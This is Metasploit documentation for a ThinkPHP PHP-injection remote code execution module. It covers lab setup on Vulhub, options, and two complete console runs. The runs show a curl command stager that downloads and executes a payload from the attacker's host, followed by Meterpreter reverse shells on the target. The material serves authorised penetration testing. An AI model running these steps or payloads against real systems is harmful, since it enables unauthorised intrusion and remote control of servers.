adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c73ebdcabac2fdf7fe929668f607b756fe2d876c
metasploit-gs/documentation/modules/exploit/unix/webapp/thinkphp_rce.md
T
William Vu c5df5355ac Update my module documentation to the new standard 
Also update CheckModule to match current style and best practices.
2020-04-20 20:06:52 -05:00

5.7 KiB
Raw Blame History

Vulnerable Application

Description

This module exploits one of two PHP injection vulnerabilities in the ThinkPHP web framework to execute code as the web user.

Versions up to and including 5.0.23 are exploitable, though 5.0.23 is vulnerable to a separate vulnerability. The module will automatically attempt to detect the version of the software.

Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub.

Setup

  1. git clone https://github.com/vulhub/vulhub
  2. cd vulhub/thinkphp/5-rce for 5.0.20 or cd vulhub/thinkphp/5.0.23-rce for 5.0.23
  3. docker-compose up -d

Verification Steps

Follow Setup and Scenarios.

Targets

0

This executes a Unix command.

1

This uses a Linux dropper to execute code.

Options

SRVPORT

If you are testing the Docker container, which binds to port 8080 by default, and you are using an HTTP(S) command stager, set this to a different port to bind the command stager server to.

Scenarios

ThinkPHP 5.0.20 from Vulhub

msf5 > use exploit/unix/webapp/thinkphp_rce
msf5 exploit(unix/webapp/thinkphp_rce) > options

Module options (exploit/unix/webapp/thinkphp_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf5 exploit(unix/webapp/thinkphp_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/thinkphp_rce) > set lhost 192.168.1.3
lhost => 192.168.1.3
msf5 exploit(unix/webapp/thinkphp_rce) > set cmdstager::flavor curl
cmdstager::flavor => curl
msf5 exploit(unix/webapp/thinkphp_rce) > set srvport 8888
srvport => 8888
msf5 exploit(unix/webapp/thinkphp_rce) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. ThinkPHP 5.0.20 is a vulnerable version.
[*] Targeting ThinkPHP 5.0.20 automatically
[*] Using URL: http://0.0.0.0:8888/IV0dIafe
[*] Local IP: http://192.168.1.3:8888/IV0dIafe
[*] Generated command stager: ["curl -so /tmp/UJiMvCsm http://192.168.1.3:8888/IV0dIafe;chmod +x /tmp/UJiMvCsm;/tmp/UJiMvCsm;rm -f /tmp/UJiMvCsm"]
[*] Executing command: curl -so /tmp/UJiMvCsm http://192.168.1.3:8888/IV0dIafe;chmod +x /tmp/UJiMvCsm;/tmp/UJiMvCsm;rm -f /tmp/UJiMvCsm
[*] Client 192.168.1.3 (curl/7.52.1) requested /IV0dIafe
[*] Sending payload to 192.168.1.3 (curl/7.52.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012516 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:64475) at 2020-04-13 01:02:13 -0500
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: no-user @ c94d71fb70ec (uid=33, gid=33, euid=33, egid=33)
meterpreter > sysinfo
Computer     : 172.21.0.2
OS           : Debian 9.4 (Linux 4.19.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

ThinkPHP 5.0.23 from Vulhub

msf5 exploit(unix/webapp/thinkphp_rce) > set rport 8081
rport => 8081
msf5 exploit(unix/webapp/thinkphp_rce) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. ThinkPHP 5.0.23 is a vulnerable version.
[*] Targeting ThinkPHP 5.0.23 automatically
[*] Using URL: http://0.0.0.0:8888/zD3iTDja
[*] Local IP: http://192.168.1.3:8888/zD3iTDja
[*] Generated command stager: ["curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf"]
[*] Executing command: curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf
[*] Client 192.168.1.3 (curl/7.52.1) requested /zD3iTDja
[*] Sending payload to 192.168.1.3 (curl/7.52.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012516 bytes) to 192.168.1.3
[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.3:64482) at 2020-04-13 01:03:29 -0500
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: no-user @ 9a6301c3c31d (uid=33, gid=33, euid=33, egid=33)
meterpreter > sysinfo
Computer     : 172.22.0.2
OS           : Debian 9.6 (Linux 4.19.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink